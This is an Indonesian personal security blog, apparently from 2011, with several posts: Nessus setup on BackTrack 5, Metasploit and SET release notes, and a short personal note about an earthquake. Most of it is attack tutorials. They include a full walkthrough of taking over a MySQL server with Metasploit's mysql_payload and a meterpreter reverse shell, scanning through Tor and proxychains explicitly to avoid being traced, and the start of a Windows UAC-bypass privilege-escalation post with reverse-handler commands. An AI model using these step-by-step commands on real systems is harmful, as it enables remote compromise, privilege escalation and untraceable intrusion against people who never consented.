Aktivasi nessus – Bactrack 5
Secara default Nessus sudah terinstall pada Bactrack 5.namun perlu aktifasi untuk menggunakannya.aktifasi ini juga bertujuan untuk meng-update plugin2 nessus.
Berikut langkah – langkah aktivasi nessus pada backtrack 5 :
1. Silahkan daftar pada website nessus di http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code untuk mendapatkan activation code.ada 2 pilihan subscriber.HomeFeed atau Professional Feed.sesuaikan dengan keperluan.
Nantinya Kode Aktifasi akan dikirim ke email anda
2. Aktifasi Nessus dengan command line.
jika anda menggunakan proxy,ubalah settingan nessus ( /opt/nessus/etc/nessus/nessus-fetch.rc.
contoh konfigurasi :
proxy=192.168.10.2
proxy_port=8080
proxy_username=isi_dengan_user_name_jika_ada
proxy_password=passwordnya_juga
aktivasi nessus dengan perintah :
root@vee-lab:/opt/nessus/bin#./nessus-fetch –register KodeRegistrasiNessus
jika sudah berhasil maka akan ada notifikasi sebagai berikut :
Your activation code has been registered properly – thank you.
Now fetching the newest plugin set from plugins.nessus.org
Nessus akan mendownload plugin terbaru dari websitenya
3. Penambahan User untuk login.
ubah ke direktory sbin ( cd /opt/nessus/sbin)
jalankan perintah :
./nessus-adduser
Login : ian-hrm
Login password :
Login password (again) :
Do you want this user to be a Nessus ‘admin’ user ? (can upload plugins, etc…) (y/n) [n]: y
User rules
———-
nessusd has a rules system which allows you to restrict the hosts
that ian-hrm has the right to test. For instance, you may want
him to be able to scan his own host only.Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)Login : ian-hrm
Password : ***********
This user will have ‘admin’ privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
User added
root@vee-lab:/opt/nessus/sbin#
3. jalankan service nessus
/etc/init.d/nessusd start
4. buka browser,login ke halaman administrasi nessus dengan alamat https://ip_address_nessus:8834
setelah itu tunggu beberapa saat nessus akan mengupdate plugin – plugin yang sudah didownload.jika sudah selesai,form login akan keluar.masukan username dan password sesuai dengan konfigurasi yang sudah di lakukan di awal
happy scanning
-ian hrm
metasploit framework v3.7.0 released
hari ini metasploit framework v3.7.0 sudah di release.ada beberapa perubahan yang dilakukan jika di bandingkan dengan versi sebelumnya dan pastinya jadi lebih bagus
berikut release note dari metasploit team
Statistics
Metasploit now ships with 685 exploit modules, 355 auxiliary modules, and 39 post modules.
35 new exploits, 17 post-exploitation modules, and 15 auxiliary modules have been added since the last release.Feature highlights
Support for SMB signing, enabling pass-the-hash and stolen password attacks against Windows 2008 Server environments.
The Microsoft SQL Server mixin (and all modules) now supports NTLM authentication.
Data import backend has undergone a rewrite, speeding up most import tasks by a factor of four.
OS information is now normalized to make fingerprinting more accurate and easier to deal with.Highlights from the new modules include:
Apple iOS Backup File Extraction: Extract sensitive data from iTunes backup files (location, call history, SMS content, pictures, etc).
Exploits for two different Adobe Flash vulnerabilities exploited in the wild.
Code execution modules for MySQL and PostgreSQL when a valid login is available.
Exploit for the Accellion File Transfer Appliance Default Encryption Key flaw found by Rapid7.
Over ten new exploits for HP Network Node Manager (plus an HP OpenView exploit).
Post-exploitation module for privilege escalation through the .NET Optimizer Service.
Post-exploitation modules for stealing stored WinSCP and VNC passwords.
download : http://metasploit.com/download/
pentesting database server
ketika melakukan pentesting ke sebuah jaringan terkadang kita menemukan beberapa resouce jaringan antara lain web server,dns server,email dll.khusunya pentesting terhadap web server.jika kita melihat konfigurasi website,kadang – kadang database server yang digunakan terpisah dengan web servernya.so gimana caranya menguasai remote database server dengan mengetahui data – data penting misalnya username,password dan nama database yang digunakan..??
saya coba memberikan solusi terhadap kasus diatas.topologi yang digunakan bisa dilihat pada gambar.tool yang digunakan seperti biasanya.metasploit lagi.kebetulan bereapa bulan lalu ( lupa tepatnya )team metasploit menambahkan 2 module untuk database hacking antara lain module untuk mysql dan postgresql.
1.Mysql Server
pentesting terhadap mysql bisa dilakukan dengan beberapa cara,misalnya menggunakan metasploit ataupun dengan teknik mysql blob.tetapi intinya sama.menambahkan sebuah fungsi baru(user defined function) misalnya sys_eval ataupun sys_exec yang nantinya digunakan untuk mengeksekusi payload.untuke lebih jelasnya tentang UDF function bisa dilihat dari website http://www.mysqludf.org/
module yang digunakan ada beberapa macam ( auxiliary dan exploit ):
Auxiliary
=========Name Description
—- —————-
admin/mysql/mysql_enum MySQL Enumeration Module
admin/mysql/mysql_sql MySQL SQL Generic Queryexploit
Name Description
—- —————-
windows/mysql/mysql_payload Oracle MySQL for Microsoft Windows Payload Execution
melihat konfigurasi mysql bisa menggunakan auxiliary admin/mysql/mysql_enum :
msf > use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > show optionsModule options (auxiliary/admin/mysql/mysql_enum):
Name Current Setting Required Description
—- ————— ——– ———–
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 3306 yes The target port
USERNAME no The username to authenticate asmsf auxiliary(mysql_enum) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf auxiliary(mysql_enum) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_enum) > set PASSWORD ian123
PASSWORD => ian123
msf auxiliary(mysql_enum) > run[*] Running MySQL Enumerator…
[*] Enumerating Parameters
[*] MySQL Version: 5.5.11
[*] Compiled for the following OS: Win32
[*] Architecture: x86
[*] Server Hostname: vee-lab
[*] Data Directory: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.5\Data\
[*] Logging of queries and logins: OFF
[*] Old Password Hashing Algorithm OFF
[*] Loading of local files: ON
[*] Logins with old Pre-4.1 Passwords: OFF
[*] Allow Use of symlinks for Database Files: YES
[*] Allow Table Merge:
[*] SSL Connection: DISABLED——— SNIPET ————–
untuk melakukan hacking terhadap database tersebut exploit mysql_payload :
sf > use exploit/windows/mysql/mysql_payload
msf exploit(mysql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mysql_payload) > set LHOST 192.168.10.2
LHOST => 192.168.10.2
msf exploit(mysql_payload) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf exploit(mysql_payload) > set USERNAME root
USERNAME => root
msf exploit(mysql_payload) > set PASSWORD ian123
PASSWORD => ian123
msf exploit(mysql_payload) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.10.2:4444
msf exploit(mysql_payload) > [*] Checking target architecture…
[*] Checking for sys_exec()…
[*] Checking target architecture…
[*] Checking for MySQL plugin directory…
[*] Target arch (win32) and target path both okay.
[*] Uploading lib_mysqludf_sys_32.dll library to C:/Program Files/MySQL/MySQL Server 5.5/lib/plugin/itfkdrZG.dll…
[*] Checking for sys_exec()…
[*] Command Stager progress – 1.47% done (1499/102246 bytes)
[*] Command Stager progress – 2.93% done (2998/102246 bytes)
[*] Command Stager progress – 4.40% done (4497/102246 bytes)
[*] Command Stager progress – 5.86% done (5996/102246 bytes)
[*] Command Stager progress – 7.33% done (7495/102246 bytes)
[*] Command Stager progress – 8.80% done (8994/102246 bytes)
[*] Command Stager progress – 10.26% done (10493/102246 bytes)
[*] Command Stager progress – 11.73% done (11992/102246 bytes)
[*] Command Stager progress – 13.19% done (13491/102246 bytes)
[*] Command Stager progress – 14.66% done (14990/102246 bytes)
……………………………..
[*] Command Stager progress – 86.50% done (88441/102246 bytes)
[*] Command Stager progress – 87.96% done (89940/102246 bytes)
[*] Command Stager progress – 89.43% done (91439/102246 bytes)
[*] Command Stager progress – 90.90% done (92938/102246 bytes)
[*] Command Stager progress – 92.36% done (94437/102246 bytes)
[*] Command Stager progress – 93.83% done (95936/102246 bytes)
[*] Command Stager progress – 95.29% done (97435/102246 bytes)
[*] Command Stager progress – 96.76% done (98934/102246 bytes)
[*] Command Stager progress – 98.19% done (100400/102246 bytes)
[*] Command Stager progress – 99.59% done (101827/102246 bytes)
[*] Command Stager progress – 100.00% done (102246/102246 bytes)
[*] Sending stage (749056 bytes) to 192.168.10.11
[*] Meterpreter session 1 opened (192.168.10.2:4444 -> 192.168.10.11:1041) at 2011-05-03 16:04:07 +0700
msf exploit(mysql_payload) > sessions -i 1
[*] Starting interaction with 1…meterpreter > ps
Process list
============PID Name Arch Session User Path
— —- —- ——- —- —-
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
628 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
676 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
700 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
744 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
756 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
912 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
980 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1064 SbieSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Sandboxie\SbieSvc.exe
1080 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1208 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1240 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1588 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1644 explorer.exe x86 0 LAHARISI\ian-lab1 C:\WINDOWS\Explorer.EXE
1736 ehtray.exe x86 0 LAHARISI\ian-lab1 C:\WINDOWS\ehome\ehtray.exe
1744 SharedIntApp.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Parallels\Parallels Tools\SIA\SharedIntApp.exe
1752 prl_cc.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Parallels\Parallels Tools\prl_cc.exe
1760 jusched.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Common Files\Java\Java Update\jusched.exe
1772 SbieCtrl.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Sandboxie\SbieCtrl.exe
Read the rest of this entry
Gempa Di Kendari
mmmmmm..
pagi – pagi dapat sms dari sepupu.
kak barsan gempa kersa bangat n sudah nyusul 3 kali.kaaaaaaakk mohon doakan kami disini.
ternyata nyusul beberapa sms lagi bernada sama..hadohhh
langsung dah buka websitenya bmkg..ternyata disana sudah ditulis
untung tidak berpotensi tsunami.Ya Allah semoga mereka semua dalam keadaan baik2.amin
pentesting through tor – escape via tor
pada postingan sebelumnya saya jelaskan tentang cara menggunakan proxy standar untuk melakukan pentest.kali ini coba dijelaskan sedikit tentang penggunaan tor untuk melakukan information gatering,scanning ataupun pentesting.
definisi tor bisa dilihat di wikipedia
sedikit penjelasan saya tentang tor :
tor merupakan virtual tunnel yang memungkinkan untuk ‘menyembunyikan’ identitas kita selama berselancar di internet.fungsinya sama seperti proxy yang lain sebagai anonimity tetapi struktur jaringannya berbeda.pada jaringan tor dikenal dengan beberapa istilah antara lain tor node dan tor exit node .
ketika pertama kali menggunakan aplikasi tor,kita akan terhubung dengan tor node yang jumlahnya lebih dari satu.tor node ini akan terhubung lagi dengan tor node yang lain dengan koneksi yang dienkripsi.itulah sebabnya jaringan tor benar2 lemot..tapi gk masalah..yang penting bisa buat pentest.:)
setelah terhubung dengan beberapa tor node,paket akan diteruskan ke network device selanjutnya yang disebut tor exit node.dari sinilah paket kemudia diteruskan ke tujuan yang sebenarnya.ya agak berliku2.
aplikasi pendukung tor bisa dilihat di websitenya tor website
ketika sudah terhubung dengan jaringan tor,aplikasi tor menggunakan port 9050 host localhost ( 127.0.0.1 ) type socks5 untuk berkomunikasi.
aplikasi pentest yang digunakan tidak berbedah jauh dari pentest dengan proxy biasa misalnya proxychain,prtunnel,socat.cuma ada beberapa tools tambahan yang akan digunakan.
1.torsocks
aplikasi ini mirip dengan proxychains.bedanya cuma torsocks hanya bisa digunakan dengan jaringan tor.
instalasinya cukup mudah.download ditorsockstinggal instal seperti biasa ( make, make install).
penggunaan :
usewithtor nama_program
contoh proses banner grabbing menggunakan torsocks
usewithtor nc -v 203.xxx.xxx.xxx 80
Connection to 203.xxx.xxx.xxx 80 port [tcp/http] succeeded!
GET / HTTP/1.0HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.65
Date: Wed, 20 Apr 2011 11:34:11 GMT
Content-Type: text/html
Content-Length: 185
Connection: close
Location: http://blablabla.com/
Server: id8301 Moved Permanently 301 Moved Permanently
nginx/0.7.65
torsocks ‘memerintahkan’ netcat ( nc ) untuk melakukan koneksi ke ip yang ditentukan
2.tortunnel
tortunnel merupakan aplikasi yang dikembangkan oleh moxi marlinespike
tortunnel.
sebelum instalasi pastikan boost library sudah terinstall dengan benar.:)
berbeda dengan aplikasi tor yang lainnya,tortunnel tidak terhubung dengan tor node.tortunnel langsung terhubung dengan tor exit node sehinga jalur yang dilalui menjadi lebih sedikit.so koneksinya gk lemot2 amat..:)
untuk mengetahui list ip tor exit node bisa dilihat di daftar tor exit node.pilih ip dengan status “Exit” “Running” and “Fast.”
contoh :
root@ian:~# torproxy 189.103.65.55
torproxy 0.2 by Moxie Marlinspike.
Retrieving directory listing…
Connecting to exit node: 189.103.65.55:443
SSL Connection to node complete. Setting up circuit.
Connected to Exit Node. SOCKS proxy ready on 5060.
189.103.65.55 merupakan ip dari salah satu tor exit node.port 5060 type socks5 bisa digunakan untuk komunikasi..langkah selanjutnya adalah konfigurasi proxychain.
config :
socks5 127.0.0.1 5060
contoh ketika menggunakan nmap untuk melakukan scanning yang ditunnel dengan tortunnel
proxychains nmap -sT -p80,443,22,21,53 203.xxx.xxx.xxx
ProxyChains-3.1 (http://proxychains.sf.net)Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-20 19:26 WIT
|S-chain|–127.0.0.1:5060–203.xxx.xxx.xxx:80–OK
|S-chain|–127.0.0.1:5060–203.xxx.xxx.xxx:21-<–timeout
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
|S-chain|–127.0.0.1:5060–203.xxx.xxx.xxx:443-<–timeout
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
|S-chain|–127.0.0.1:5060–203.xxx.xxx.xxx:22-<–timeout
|S-chain|–127.0.0.1:5060–203.xxx.xxx.xxx:53-<–timeout
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 203.xxx.xxx.xxx
Host is up (2.7s latency).
PORT STATE SERVICE
21/tcp closed ftp
22/tcp closed ssh
53/tcp closed domain
80/tcp open http
443/tcp closed https
output dari tortunnel :
Got SOCKS Connection…
Got SOCKS Request: 203.xxx.xxx.xxx:80
Successfully opened Tor exit Node stream…
Got SOCKS Connection…
CIRCUIT: Close called…
Got SOCKS Request: 203.xxx.xxx.xxx:21
Error opening stream: system:111
Got SOCKS Connection…
Got SOCKS Request: 203.xxx.xxx.xxx:443
Error opening stream: system:111
Got SOCKS Connection…
Got SOCKS Request: 203.xxx.xxx.xxx:22
Got SOCKS Connection…
Got SOCKS Request: 203.xxx.xxx.xxx:53
Error opening stream: system:111
Error opening stream: system:111
aplikasi yang bisa dikombinasikan dengan tortunnel bermacam – macam.misalnya netcat,nmap,metasploit dll.tergantung kreativitas masing2 saja…
selamat menikmati
— LD ian hrm a.k.a laharisi —
pentest through tunneling – escape via proxy
kembali lagi dengan ian hrm.Kali ini saya coba bagi – bagi sedikit teknik tentang tunneling.Tunneling merupakan salah satu teknik yang digunakan untuk mencegah Tracking ( pelacakan ) ketika melakukan penetration testing.Secara umum untuk menyembunyikan alamat IP yang kita gunakan dengan memanfaatkan resource jaringan yang lain,misalnya proxy,host,server dll.Teknik tunneling sendiri ada beberapa macam.sesuai dengan kondisi.misalnya tunneling menggunakan proxy,tor,atau dengan SSH
Beberapa Tools yang sering ane gunakan diantaranya :
1.Proxychains
mmm..Aplikasi yang sangat sering saya gunakan.salah satu kelebihannya aplikasi ini bisa digunakan untuk tunneling dengan lebih dari 5 proxy..tapi dengan resiko bandwidth jadi terkuras alias lemot..Aplikasi ini bisa didownload dihttp://proxychains.sourceforge.net/.
bagi yang sering pake backtrack aplikasi ini sudah ada didalam.bagi pengguna ubuntu install dengan sudo apt-get install proxychains.
konfigurasinya juga cukup gampang.file konfignya biasanya ada pada /etc/proxychains.conf.
config :
Protokol Alamat_Ip_Proxy Port_proxy
contoh :
http 192.168.10.100 8080
setelah konfigurasi dah siap,tinggal dijalankan aja proxchains.
root@vee-lab:~# proxychains
ProxyChains-3.1 (http://proxychains.sf.net)
usage:
proxychains [args]
poxychain memerlukan aplikasi tambahn yang akan dijalankan lewat tunneling..
tenang aja…tar ada contoh kasusnya..:)
Read the rest of this entry
Social Engineering v1.3 “altillery edition”
sudah hampir 1 minggu,social engineering tools versi 1.3 di release.cuma baru ada waktu sekarang buat direview..hehehehe..
tools ini merupakan hasil kreasi oleh David ‘Rel1k’ Kennedy.
pada versi 1.3 ada beberapa penambahan fitur diantaranya social enginering shell,RATT http tunneling.
change log :
Updated the web-gui interface to reflect all new PDF exploits
* Updated the web-gui interface to reflect all new client-side exploits
* Added a new setup.py installer file for debian based systems only, will add manual install options later
* Updated all of the powershell HID attack vectors to fix bugs and support multi-language support. Thanks padzero!
* Added AES encryption to the socket communication, it requires Crypto.Cipher which is from the PyCrypto libraries.
* Added python-crypto to the installer setup.py installation
* Fixed web-gui alignment on new options so they match up properly to SET-interface
* Added better error handling around the openssl python module if it isn’t installed
* Added download_file capabilities into the SET interactive shell.
* Added upload_file capabilites into the SET interactive shell.
* Added shell capabilties into the SET interactive shell.
* Added ssh_tunneling capabilities into the SET interactive shell. You can tunnel any port you want to over ssh
* Added a teensy Gnome wget payload thanks to Hugo Caron (y0ug)!
* Fixed a bug in a menu where teensy payload return to menu would not return properly to main menu
* Fixed a bug where the Mass Mailer Menu didn’t properly return back to main menu when specified.
* Added process list in the SET interactive shell.
* Added process kill in the SET interactive shell.
* Added dsniff to set_config as an option instead of ettercap, can use either one.
* Added centralized logging in SET, log files will now be dumped to src/logs/set_logfile.log
* Added logging to main SET interface, handles main SET interactive shell errors
* Added logging to arp_cache.py file, handles arp cache errors
* Added logging to hijacking.py file, handles dll_hijacking errors
* Added logging to harvester.py file, handles credential harvesting errors
* Added logging to payloadgen.py file, handles payload generation errors
* Fixed a bug where if site wouldn’t clone properly it would just exit SET, it now just returns back to main menu.
* Fixed a bug where the new addition to dnsspoof would not properly kill dnsspoof when exiting SET, it now terminates when an exception is thrown
* Added logging to web_server.py file, handles main SET web server errors
* Added logging to spawn.py file, handles main spawn handles for SET
* Added the ability to specify high priority during emails or not, thanks Jonathan Murray!
* Added new core module libary called log(error) will centralize log messages through core function calls
* Added the new Sun Java Applet2ClassLoader Remote Code Execution Exploit from Frederic Hoguin and jduck that was recently added to Metasploit
* Moved version number to src/main/ instead of src root
* Added the new RATTE payloads to SET that was created by Thomas Werth to circumvent firewall based restrictions. Awesome addition!
* Added the new DSNIFF changes to the web gui to ensure that when the option is enabled in set_config it now gets picked up in web gui
* Fixed a bug in web gui where if HTML/Plain wasn’t specified, it would not properly run the answer file to launch the attack
* Added the SET interactive shell to the Java Applet Attack Vector on the SET web-gui
* Fixed a mishandling of OS.Error exceptions in spawn.py which caused SET to spit out a pexpect exceptions error when using KeyBoardInterrupt exceptions handler
* Deleted the database directory under src, was no longer needed
* Added the Sun Java Applet2ClassLoader Remote Code Execution by Frederic Hoguin and jduck to the web gui interface
* Added RATTE to the SET Web GUI under the payload selection area, it’s only to be used for the Java Applet attack.
* Added the Adobe Flash Player AVM Bytecode Verification Vulnerability from the Metasploit Framework to SET
* Added the Adobe Flash Player AVM Bytecode Verification Vulnerability to the SET web gui.
* Added six more spear-phishing templates that can be found under the spear-phish attack menu
* Added a new attack vector called the SET Wireless Attack Vector, this will create a fake access point and redirect all traffic to you
* Added the ability to stop all services/processes started by the SET Wireless Attack vector, it is now under the options menu
* Added the Thomas Werth RATTE module to third party modules as well as under the main payload section. Great example to tweak third party modules and add things.
* Added airbase-ng to SET in case it is not installed. Thanks to Mister-X for the approval to include it into SET!
* Added new wireless attack vector to the SET web gui, menus have been changed slightly
* Added the new templates recently added to the SET web gui, they are under the spear-phish menu
* Added a binary rewrite of UPX encoder stubs so that it randomizes a three character alphanumeric to remove UPX from the binary. A bit better obfsucation for A/V detection.
* Fixed a bug where upx encoding wasn’t working properly and wouldn’t encode the right binary
* Added a new core module called core.upx(path_to_file) which will automatically encode the file via upx and rewrite the UPX stubs with a three character alphanumeric stub
* Fixed a bug in the SET interactive shell that was causing it to fail if the pycrypto modules were not installed.
boleh juga…tapi penasaran sama RATTE HTTP tunneling..langsung dicobain
aplikasi ini menggunakan teknik HTTP tunneling sehingga ketika di trace pake wireshark,trafficnya menunjukan HTTP biasa..mmmm..keren juga..
lumayanlah untuk melakukan pentest-pentest.SET custom shell lom sempat ane coba coz masih ada error sedikit.lagi ane modifikasi scriptnya..
— selamat menikmati —
Privilege escalation – windows UAC bypass
Pada Tutorial sebelumnya dijelaskan cara privileged escalation dengan menggunakan kelemahan sistem operasi.Teknik tersebut hanya berlaku untuk windows Vista,2008,Windows Seven yang tidak di patch.Jika windowsnya sudah dipatch,teknik dengan schelevator script tidak dapat digunakan lagi.Untuk itu diperlukan teknik baru untuk mengatasi masalah ini.Salah satu teknik yang bisa digunakan adalah dengan cara membypass UAC ( Users Acces Control )
Menurut wikipedia :
User Account Control (UAC) is a technology and security infrastructure introduced with Microsoft’s Windows Vista and Windows Server 2008 operating systems, with a more relaxed[1] version also present in Windows 7 and Windows Server 2008 R2 . It aims to improve the security of Microsoft Windows by limiting application software to standard user privileges until an administrator authorizes an increase or elevation. In this way, only applications trusted by the user may receive administrative privileges, and malware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it
Jadi program yang tidak mempunyai Windows Publisher certificate dijalankan dengan hak administrator,windows akan menampilkan sebuah peringatan seperti pada gambar diatas.
tools :
– Metasploit v3.7.0-dev
– OS : windows 7 x64 bit fully patched
Tanpa UAC bypass :
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ — –=[ 682 exploits – 350 auxiliary
+ — –=[ 218 payloads – 27 encoders – 8 nops
=[ svn r12260 updated today (2011.04.06)resource (multihander.rc)> use exploit/multi/handler
resource (multihander.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (multihander.rc)> set LHOST 172.16.16.2
LHOST => 172.16.16.2
resource (multihander.rc)> set LPORT 443
LPORT => 443
resource (multihander.rc)> exploit -j -z
[*] Exploit running as background job.[*] Started reverse handler on 172.16.16.2:443
[*] Starting the payload handler…
msf exploit(handler) >
[*] Sending stage (749056 bytes) to 172.16.16.15
[*] Meterpreter session 1 opened (172.16.16.2:443 -> 172.16.16.15:49157) at 2011-04-07 15:35:40 +0700
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getuid
Server username: ian-PC\ian
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter >
ketika melakukan privilege escalation,windows membatalkan caranya tersebut.
Read the rest of this entry
Ian Hrm 